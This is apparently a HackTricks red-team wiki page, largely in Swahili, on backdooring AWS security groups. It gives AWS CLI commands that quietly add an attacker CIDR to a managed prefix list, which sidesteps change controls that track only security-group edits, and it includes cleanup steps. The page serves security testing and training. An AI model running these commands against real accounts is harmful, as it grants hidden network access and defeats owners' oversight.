AWS - Security Group Backdoor via Managed Prefix Lists

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

Tumia vibaya customer-managed Prefix Lists kuunda njia ya kuingia kwa siri. Kama rule ya security group (SG) inarejea managed Prefix List, mtu yeyote mwenye uwezo wa kubadilisha list hiyo anaweza kimya kimya kuongeza CIDRs zinazodhibitiwa na mshambulizi. Kila SG (na huenda pia Network ACL au VPC endpoint) inayorejea list hiyo hukubali mara moja mikoa ya IP mpya bila mabadiliko yoyote yanayoonekana kwenye SG.

Athari

  • Upanuzi wa papo hapo wa allowed IP ranges kwa SG zote zinazorejea prefix list, ukiepuka change controls ambazo zinafuatilia tu uhariri wa SG.
  • Inaruhusu backdoors ya kudumu ya ingress/egress: weka CIDR hatarishi iliyofichwa ndani ya prefix list wakati rule ya SG inaonekana bila mabadiliko.

Mahitaji

  • IAM permissions:
  • ec2:DescribeManagedPrefixLists
  • ec2:GetManagedPrefixListEntries
  • ec2:ModifyManagedPrefixList
  • ec2:DescribeSecurityGroups / ec2:DescribeSecurityGroupRules (kutambua SG zilizounganishwa)
  • Optional: ec2:CreateManagedPrefixList if creating a new one for testing.
  • Environment: Angalau rule moja ya SG inayorejea target customer-managed Prefix List.

Variables

bash
REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor – allow attacker"

Hatua za kushambulia

  1. Orodhesha prefix lists zinazowezekana na consumers
bash
aws ec2 describe-managed-prefix-lists \
--region "$REGION" \
--query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
--output table

aws ec2 get-managed-prefix-list-entries \
--prefix-list-id "$PREFIX_LIST_ID" \
--region "$REGION" \
--query 'Entries[*].[Cidr,Description]'

Tumia aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID kuthibitisha ni sheria gani za SG zinategemea orodha hiyo.

  1. Ongeza attacker CIDR kwenye prefix list
bash
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
--region "$REGION"
  1. Thibitisha kuenezwa kwa security groups
bash
aws ec2 describe-security-group-rules \
--region "$REGION" \
--filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
--query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
--output table

Trafiki kutoka $ENTRY_CIDR sasa imeruhusiwa kila mahali prefix list inapotajwa (kawaida outbound rules kwenye egress proxies au inbound rules kwenye shared services).

Ushahidi

  • get-managed-prefix-list-entries inaonyesha CIDR ya mshambulizi na maelezo.
  • describe-security-group-rules bado inaonyesha sheria ya asili ya SG inayorejelea prefix list (hakuna marekebisho ya SG yaliyoripotiwa), lakini trafiki kutoka CIDR mpya inafanikiwa.

Usafishaji

bash
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--remove-entries Cidr="$ENTRY_CIDR" \
--region "$REGION"

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks